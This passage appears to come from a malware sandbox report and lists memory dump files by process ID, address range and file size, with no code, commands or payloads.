memory/7780-490-0x0000000000400000-0x0000000000474000-memory.dmpFilesize
464KB
-
memory/7784-701-0x0000000006642000-0x0000000006643000-memory.dmpFilesize
4KB
-
memory/7784-744-0x0000000006C40000-0x0000000006C41000-memory.dmpFilesize
4KB
-
memory/7784-810-0x0000000006643000-0x0000000006644000-memory.dmpFilesize
4KB
-
memory/7784-792-0x0000000009250000-0x0000000009251000-memory.dmpFilesize
4KB
-
memory/7784-794-0x0000000007D70000-0x0000000007D71000-memory.dmpFilesize
4KB
-
memory/7784-697-0x0000000006C80000-0x0000000006C81000-memory.dmpFilesize
4KB
-
memory/7784-705-0x0000000007570000-0x0000000007571000-memory.dmpFilesize
4KB
-
memory/7784-693-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/7784-700-0x0000000006640000-0x0000000006641000-memory.dmpFilesize
4KB
-
memory/7784-696-0x0000000004440000-0x0000000004441000-memory.dmpFilesize
4KB
-
memory/7784-829-0x0000000008C20000-0x0000000008C21000-memory.dmpFilesize
4KB
-
memory/7784-703-0x0000000007500000-0x0000000007501000-memory.dmpFilesize
4KB
-
memory/7784-828-0x0000000008FF0000-0x0000000008FF1000-memory.dmpFilesize
4KB
-
memory/7784-702-0x0000000006B80000-0x0000000006B81000-memory.dmpFilesize
4KB
-
memory/7820-599-0x00000000058F0000-0x00000000058F1000-memory.dmpFilesize
4KB
-
memory/7820-592-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/7820-591-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/7832-652-0x0000000002A20000-0x0000000002A22000-memory.dmpFilesize
8KB
-
memory/7832-648-0x00007FFCA0790000-0x00007FFCA117C000-memory.dmpFilesize
9.9MB
-
memory/7868-991-0x0000000005670000-0x0000000005671000-memory.dmpFilesize
4KB
-
memory/7868-968-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/7940-760-0x00007FFCA1320000-0x00007FFCA1CC0000-memory.dmpFilesize
9.6MB
-
memory/7940-763-0x0000000000C40000-0x0000000000C42000-memory.dmpFilesize
8KB
-
memory/7944-580-0x0000000001710000-0x0000000001711000-memory.dmpFilesize
4KB
-
memory/7944-571-0x0000000000400000-0x0000000000436000-memory.dmpFilesize
216KB
-
memory/7944-572-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/7952-500-0x0000000005E90000-0x0000000005E94000-memory.dmpFilesize
16KB
-
memory/7952-493-0x0000000000A40000-0x0000000000A41000-memory.dmpFilesize
4KB
-
memory/7952-907-0x00000000013B0000-0x0000000001416000-memory.dmpFilesize
408KB
-
memory/7952-501-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/7952-491-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/7952-504-0x000000007F570000-0x000000007F571000-memory.dmpFilesize
4KB
-
memory/7952-917-0x0000000001030000-0x0000000001051000-memory.dmpFilesize
132KB
-
memory/8088-519-0x0000000002650000-0x0000000002651000-memory.dmpFilesize
4KB
-
memory/8168-732-0x00000125D66A0000-0x00000125D66A1000-memory.dmpFilesize
4KB
-
memory/8216-1012-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/8280-855-0x0000000001C70000-0x0000000001C71000-memory.dmpFilesize
4KB
-
memory/8300-1058-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8300-1072-0x00000000053F0000-0x00000000053F1000-memory.dmpFilesize
4KB
-
memory/8308-862-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/8384-901-0x0000000004800000-0x0000000004801000-memory.dmpFilesize
4KB
-
memory/8384-899-0x00000000047E0000-0x00000000047E1000-memory.dmpFilesize
4KB
-
memory/8384-835-0x0000000003011000-0x000000000303C000-memory.dmpFilesize
172KB
-
memory/8384-847-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/8384-849-0x0000000004700000-0x0000000004701000-memory.dmpFilesize
4KB
-
memory/8384-902-0x0000000004810000-0x0000000004811000-memory.dmpFilesize
4KB
-
memory/8384-851-0x0000000004710000-0x0000000004711000-memory.dmpFilesize
4KB
-
memory/8384-853-0x0000000004720000-0x0000000004721000-memory.dmpFilesize
4KB
-
memory/8384-891-0x0000000004760000-0x0000000004761000-memory.dmpFilesize
4KB
-
memory/8384-892-0x0000000004770000-0x0000000004771000-memory.dmpFilesize
4KB
-
memory/8384-900-0x00000000047F0000-0x00000000047F1000-memory.dmpFilesize
4KB
-
memory/8384-889-0x0000000004740000-0x0000000004741000-memory.dmpFilesize
4KB
-
memory/8384-888-0x0000000004730000-0x0000000004731000-memory.dmpFilesize
4KB
-
memory/8384-898-0x00000000047D0000-0x00000000047D1000-memory.dmpFilesize
4KB
-
memory/8384-897-0x00000000047C0000-0x00000000047C1000-memory.dmpFilesize
4KB
-
memory/8384-896-0x00000000047B0000-0x00000000047B1000-memory.dmpFilesize
4KB
-
memory/8384-895-0x00000000047A0000-0x00000000047A1000-memory.dmpFilesize
4KB
-
memory/8384-890-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/8384-894-0x0000000004790000-0x0000000004791000-memory.dmpFilesize
4KB
-
memory/8384-893-0x0000000004780000-0x0000000004781000-memory.dmpFilesize
4KB
-
memory/8392-846-0x00000000007F0000-0x00000000007F1000-memory.dmpFilesize
4KB
-
memory/8420-863-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/8428-966-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8428-993-0x0000000005830000-0x0000000005831000-memory.dmpFilesize
4KB
-
memory/8484-908-0x00000200BFE50000-0x00000200BFE51000-memory.dmpFilesize
4KB
-
memory/8484-903-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/8492-1232-0x000001A39BE10000-0x000001A39BE11000-memory.dmpFilesize
4KB
-
memory/8668-1242-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8668-1259-0x0000000005950000-0x0000000005951000-memory.dmpFilesize
4KB
-
memory/8732-1026-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8732-1034-0x0000000004EB0000-0x0000000004EB1000-memory.dmpFilesize
4KB
-
memory/8740-1064-0x00000000056A0000-0x00000000056A1000-memory.dmpFilesize
4KB
-
memory/8740-1046-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8744-874-0x0000000001C60000-0x0000000001C61000-memory.dmpFilesize
4KB
-
memory/8760-872-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/8860-1016-0x00000000021D0000-0x00000000021D2000-memory.dmpFilesize
8KB
-
memory/8860-1017-0x00007FFCA1320000-0x00007FFCA1CC0000-memory.dmpFilesize
9.6MB
-
memory/8912-842-0x00000200518C0000-0x00000200518C1000-memory.dmpFilesize
4KB
-
memory/8912-848-0x00000200518C0000-0x00000200518C1000-memory.dmpFilesize
4KB
-
memory/8912-839-0x00000200518C0000-0x00000200518C1000-memory.dmpFilesize
4KB
-
memory/8912-845-0x00000200518C0000-0x00000200518C1000-memory.dmpFilesize
4KB
-
memory/8916-939-0x00000000010E0000-0x00000000010E2000-memory.dmpFilesize
8KB
-
memory/8916-926-0x0000000000840000-0x0000000000841000-memory.dmpFilesize
4KB
-
memory/8916-914-0x00007FFCA0790000-0x00007FFCA117C000-memory.dmpFilesize
9.9MB
-
memory/8920-1209-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/8920-1217-0x00000000051D0000-0x00000000051D1000-memory.dmpFilesize
4KB
-
memory/8952-837-0x000001688B570000-0x000001688B571000-memory.dmpFilesize
4KB
-
memory/8964-838-0x000002AD9CC70000-0x000002AD9CC71000-memory.dmpFilesize
4KB
-
memory/9024-841-0x0000023A57A10000-0x0000023A57A11000-memory.dmpFilesize
4KB
-
memory/9108-1094-0x0000000001CC0000-0x0000000001CC1000-memory.dmpFilesize
4KB
-
memory/9140-1061-0x0000000005AA0000-0x0000000005AA1000-memory.dmpFilesize
4KB
-
memory/9140-1042-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/9160-911-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/9160-909-0x0000000005070000-0x0000000005071000-memory.dmpFilesize
4KB
-
memory/9160-856-0x0000000003931000-0x000000000395C000-memory.dmpFilesize
172KB
-
memory/9160-927-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/9160-930-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/9160-921-0x00000000050D0000-0x00000000050D1000-memory.dmpFilesize
4KB
-
memory/9160-923-0x00000000050E0000-0x00000000050E1000-memory.dmpFilesize
4KB
-
memory/9160-916-0x00000000050B0000-0x00000000050B1000-memory.dmpFilesize
4KB
-
memory/9160-919-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/9160-915-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/9160-910-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/9160-866-0x0000000005020000-0x0000000005021000-memory.dmpFilesize
4KB
-
memory/9160-906-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/9160-905-0x0000000005050000-0x0000000005051000-memory.dmpFilesize
4KB
-
memory/9160-887-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/9160-870-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/9160-859-0x0000000005110000-0x0000000005111000-memory.dmpFilesize
4KB
-
memory/9160-864-0x0000000005000000-0x0000000005001000-memory.dmpFilesize
4KB
-
memory/9160-865-0x0000000005010000-0x0000000005011000-memory.dmpFilesize
4KB
-
memory/9232-1003-0x00000000022A0000-0x00000000022A2000-memory.dmpFilesize
8KB
-
memory/9232-1000-0x00007FFCA1320000-0x00007FFCA1CC0000-memory.dmpFilesize
9.6MB
-
memory/9268-967-0x000001D0C57A0000-0x000001D0C57A1000-memory.dmpFilesize
4KB
-
memory/9268-972-0x000001D0C5910000-0x000001D0C5911000-memory.dmpFilesize
4KB
-
memory/9268-969-0x000001D0C5930000-0x000001D0C5931000-memory.dmpFilesize
4KB
-
memory/9392-1293-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/9396-1021-0x00007FFCA1320000-0x00007FFCA1CC0000-memory.dmpFilesize
9.6MB
-
memory/9396-1022-0x0000000002860000-0x0000000002862000-memory.dmpFilesize
8KB
-
memory/9424-937-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/9424-951-0x00000000058F0000-0x00000000058F1000-memory.dmpFilesize
4KB
-
memory/9424-933-0x0000000000400000-0x000000000041C000-memory.dmpFilesize
112KB
-
memory/9432-1013-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/9432-1008-0x00000000021F1000-0x00000000021F5000-memory.dmpFilesize
16KB
-
memory/9432-1011-0x0000000002E61000-0x0000000002E8C000-memory.dmpFilesize
172KB
-
memory/9432-1014-0x0000000002FE1000-0x0000000002FE8000-memory.dmpFilesize
28KB
-
memory/9452-970-0x000001D217A40000-0x000001D217A41000-memory.dmpFilesize
4KB
-
memory/9544-938-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/9544-959-0x0000000005200000-0x0000000005201000-memory.dmpFilesize
4KB
-
memory/9668-1018-0x0000023212730000-0x0000023212731000-memory.dmpFilesize
4KB
-
memory/9716-988-0x0000000000E00000-0x0000000000E02000-memory.dmpFilesize
8KB
-
memory/9716-984-0x00007FFCA1320000-0x00007FFCA1CC0000-memory.dmpFilesize
9.6MB
-
memory/9736-983-0x0000024BCB800000-0x0000024BCB801000-memory.dmpFilesize
4KB
-
memory/9884-992-0x00000195C6E90000-0x00000195C6E91000-memory.dmpFilesize
4KB
-
memory/9912-963-0x0000000005530000-0x0000000005531000-memory.dmpFilesize
4KB
-
memory/9912-953-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/10016-1193-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB
-
memory/10016-1205-0x0000000005740000-0x0000000005741000-memory.dmpFilesize
4KB
-
memory/10080-1112-0x0000000005230000-0x0000000005231000-memory.dmpFilesize
4KB
-
memory/10080-1110-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB
-
memory/10080-1113-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/10080-1093-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/10080-1089-0x0000000005150000-0x0000000005151000-memory.dmpFilesize
4KB
-
memory/10080-1092-0x0000000005180000-0x0000000005181000-memory.dmpFilesize
4KB
-
memory/10080-1086-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/10080-1087-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/10080-1088-0x0000000005170000-0x0000000005171000-memory.dmpFilesize
4KB
-
memory/10080-1091-0x0000000005160000-0x0000000005161000-memory.dmpFilesize
4KB
-
memory/10080-1111-0x0000000005220000-0x0000000005221000-memory.dmpFilesize
4KB
-
memory/10080-1114-0x0000000005250000-0x0000000005251000-memory.dmpFilesize
4KB
-
memory/10080-1101-0x00000000051C0000-0x00000000051C1000-memory.dmpFilesize
4KB
-
memory/10080-1085-0x0000000003A71000-0x0000000003A9C000-memory.dmpFilesize
172KB
-
memory/10080-1102-0x00000000051D0000-0x00000000051D1000-memory.dmpFilesize
4KB
-
memory/10080-1095-0x00000000051A0000-0x00000000051A1000-memory.dmpFilesize
4KB
-
memory/10080-1100-0x00000000051B0000-0x00000000051B1000-memory.dmpFilesize
4KB
-
memory/10080-1106-0x0000000005200000-0x0000000005201000-memory.dmpFilesize
4KB
-
memory/10080-1105-0x00000000051F0000-0x00000000051F1000-memory.dmpFilesize
4KB
-
memory/10080-1104-0x00000000051E0000-0x00000000051E1000-memory.dmpFilesize
4KB
-
memory/10172-1289-0x0000000002520000-0x0000000002521000-memory.dmpFilesize
4KB
-
memory/10236-1264-0x0000000005700000-0x0000000005701000-memory.dmpFilesize
4KB
-
memory/10236-1253-0x0000000070D20000-0x000000007140E000-memory.dmpFilesize
6.9MB